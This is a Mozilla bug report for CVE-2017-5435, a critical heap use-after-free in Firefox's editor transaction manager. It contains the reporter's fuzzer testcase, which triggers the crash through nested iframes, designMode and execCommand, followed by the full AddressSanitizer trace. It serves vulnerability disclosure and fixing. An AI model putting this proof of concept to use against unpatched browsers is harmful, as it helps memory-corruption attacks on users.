Bug 1350683 (CVE-2017-5435)

heap-use-after-free in nsTransactionManager::EndTransaction

VERIFIED FIXED in Firefox -esr45


People

(Reporter: nils, Assigned: smaug)

Tracking

Keywords: csectype-uaf, sec-critical
Version: Trunk
Target Milestone: mozilla55
Bug Flags: sec-bounty +

Firefox Tracking Flags

firefox-esr45: 53+ verified
firefox52: wontfix
firefox-esr52: 53+ verified
firefox53: + verified
firefox54: + verified
firefox55: + verified

Details

(Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage])

Attachments

(1 attachment)

Description (Reporter)

The following testcase crashes the latest ASAN build of Firefox (BuildID=20170326014008)

<script>
function start() {
        o1=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o1.addEventListener('load', fun0,false);
        document.body.appendChild(o1);
        o2=window.document;
}
function fun0() {
        o4=o1.contentWindow;
        o5=o1.contentDocument;
        o16=o5.getElementsByTagName('*')[1];
        o81=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o81.src='data:text/html,<div>';
        o16.appendChild(o81);
        o90=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o90.src='data:text/html,<div>';
        o90.addEventListener('load', fun2,false);
        o81.appendChild(o90);
        o1.contentWindow.onresize=fun1;
        o1.height='32px';
        o4.stop();
}
function fun1() {
        o2.designMode='on';
        o2.execCommand('heading',false,'h1');
}
function fun2() {
        o2.designMode='off';
        o4.fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==12221==ERROR: AddressSanitizer: heap-use-after-free on address 0x614000142c60 at pc 0x7f2787ba2430 bp 0x7ffd783787c0 sp 0x7ffd783787b8
READ of size 8 at 0x614000142c60 thread T0 (Web Content)
    #0 0x7f2787ba242f in nsDeque::Pop() /home/worker/workspace/build/src/xpcom/ds/nsDeque.cpp:260:7
    #1 0x7f278de14946 in Pop /home/worker/workspace/build/src/editor/txmgr/nsTransactionStack.cpp:57:58
    #2 0x7f278de14946 in nsTransactionManager::EndTransaction(bool) /home/worker/workspace/build/src/editor/txmgr/nsTransactionManager.cpp:672
    #3 0x7f278de13e29 in nsTransactionManager::DoTransaction(nsITransaction*) /home/worker/workspace/build/src/editor/txmgr/nsTransactionManager.cpp:80:8
    #4 0x7f278dc3fdd4 in mozilla::EditorBase::DoTransaction(nsITransaction*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:737:21
    #5 0x7f278dc6f604 in mozilla::EditorBase::DeleteNode(nsINode*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:1588:41
    #6 0x7f278dc714dc in mozilla::EditorBase::MoveNode(nsIContent*, nsINode*, int) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:1785:17
    #7 0x7f278dd1a78a in mozilla::HTMLEditRules::ApplyBlockStyle(nsTArray<mozilla::OwningNonNull<nsINode> >&, nsIAtom&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:6954:33
    #8 0x7f278dce69e3 in mozilla::HTMLEditRules::WillMakeBasicBlock(mozilla::dom::Selection&, nsAString const&, bool*, bool*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:3593:10
    #9 0x7f278dcce370 in mozilla::HTMLEditRules::WillDoAction(mozilla::dom::Selection*, mozilla::RulesInfo*, bool*, bool*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:649:14
    #10 0x7f278dd5285f in mozilla::HTMLEditor::InsertBasicBlock(nsAString const&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:2131:24
    #11 0x7f278dd51d36 in mozilla::HTMLEditor::SetParagraphFormat(nsAString const&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:1731:10
    #12 0x7f278de22212 in nsParagraphStateCommand::SetState(nsIEditor*, nsString&) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:648:22
    #13 0x7f278de21671 in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:595:12
    #14 0x7f278c0b7f23 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /home/worker/workspace/build/src/dom/commandhandler/nsControllerCommandTable.cpp:162:26
    #15 0x7f278c0aeef3 in DoCommandWithParams /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:152:25
    #16 0x7f278c0aeef3 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:140
    #17 0x7f278c0b50bb in nsCommandManager::DoCommand(char const*, nsICommandParams*, mozIDOMWindowProxy*) /home/worker/workspace/build/src/dom/commandhandler/nsCommandManager.cpp:212:29
    #18 0x7f278c5fa045 in nsHTMLDocument::ExecCommand(nsAString const&, bool, nsAString const&, nsIPrincipal&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:3336:18
    #19 0x7f278bb531ac in mozilla::dom::HTMLDocumentBinding::execCommand(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:835:21
    #20 0x7f278bdf313e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #21 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #22 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #23 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #24 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #25 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #26 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #27 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #28 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #29 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #30 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #31 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #32 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #33 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #34 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #35 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #36 0x7f278b895c95 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #37 0x7f278c1f8c9b in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #38 0x7f278c1f8c9b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #39 0x7f278c1c5022 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:51
    #40 0x7f278c1c6f0f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1296:20
    #41 0x7f278c1b2771 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:466:16
    #42 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #43 0x7f278e227300 in mozilla::PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/PresShell.cpp:2052:5
    #44 0x7f278e23c850 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4139:7
    #45 0x7f278a536c21 in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
    #46 0x7f278a536c21 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8023
    #47 0x7f278a536b18 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8019:22
    #48 0x7f2789529f0b in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:685:14
    #49 0x7f278952c1e2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #50 0x7f278952cf0c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #51 0x7f2787e3f9f2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
    #52 0x7f2787e3bea3 in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:271:15
    #53 0x7f278952999f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:245:22
    #54 0x7f278952981c in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:242:3
    #55 0x7f27906440c9 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:190:25
    #56 0x7f27906440c9 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5566
    #57 0x7f279069f9af in non-virtual thunk to nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5530:13
    #58 0x7f278a22700b in nsGlobalWindow::StopOuter(mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7906:22
    #59 0x7f278b604f2c in mozilla::dom::WindowBinding::stop(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:1965:9
    #60 0x7f278b604080 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15658:13
    #61 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #62 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #63 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #64 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #65 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #66 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #67 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #68 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #69 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #70 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #71 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #72 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #73 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #74 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #75 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #76 0x7f278b898b97 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #77 0x7f278c1c4fe8 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #78 0x7f278c1c4fe8 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #79 0x7f278c1c6f0f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1296:20
    #80 0x7f278c1b2771 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:466:16
    #81 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #82 0x7f278a1f32e7 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3919:7
    #83 0x7f278c1b2867 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:417:12
    #84 0x7f278c1b2867 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:469
    #85 0x7f278c1b2dec in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:519:5
    #86 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #87 0x7f278e31182c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #88 0x7f27906b6f49 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
    #89 0x7f27906b31a8 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #90 0x7f27906ba2ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #91 0x7f278952e519 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #92 0x7f278952d4cc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
    #93 0x7f278952a368 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #94 0x7f278952c1e2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #95 0x7f278952cf0c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #96 0x7f2787e3f9f2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
    #97 0x7f278a53dc0b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8879:18
    #98 0x7f278a53d7dc in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8805:9
    #99 0x7f278a51439d in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5279:3
    #100 0x7f278a5df1a2 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #101 0x7f278a5df1a2 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #102 0x7f278a5df1a2 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #103 0x7f2787c5db31 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #104 0x7f2787c8fb30 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #105 0x7f2787c8c578 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #106 0x7f2788a2eed1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #107 0x7f2788990480 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #108 0x7f2788990480 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #109 0x7f2788990480 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #110 0x7f278db3530f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #111 0x7f2791177367 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:871:22
    #112 0x7f2788990480 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #113 0x7f2788990480 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #114 0x7f2788990480 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #115 0x7f2791176d7b in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:695:34
    #116 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #117 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #118 0x7f27a323082f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #119 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)

0x614000142c60 is located 32 bytes inside of 392-byte region [0x614000142c40,0x614000142dc8)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f2787b3c357 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:25
    #2 0x7f2787b3bf57 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f2787b42f7d in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
    #4 0x7f2787b427a1 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
    #5 0x7f2787b45538 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:21
    #6 0x7f278a61bc18 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
    #7 0x7f278a193c5d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7f2787caa1f1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7f278934f784 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7f278934f784 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7f278934f784 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7f278935692c in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #15 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #16 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #17 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #19 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #20 0x7f2791f3f723 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #21 0x7f278929946b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #24 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #25 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #26 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #27 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #28 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #29 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #30 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #31 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #32 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #33 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #34 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #35 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #36 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f278dc65a8b in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f278dc65a8b in mozilla::EditorBase::EnableUndo(bool) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:759
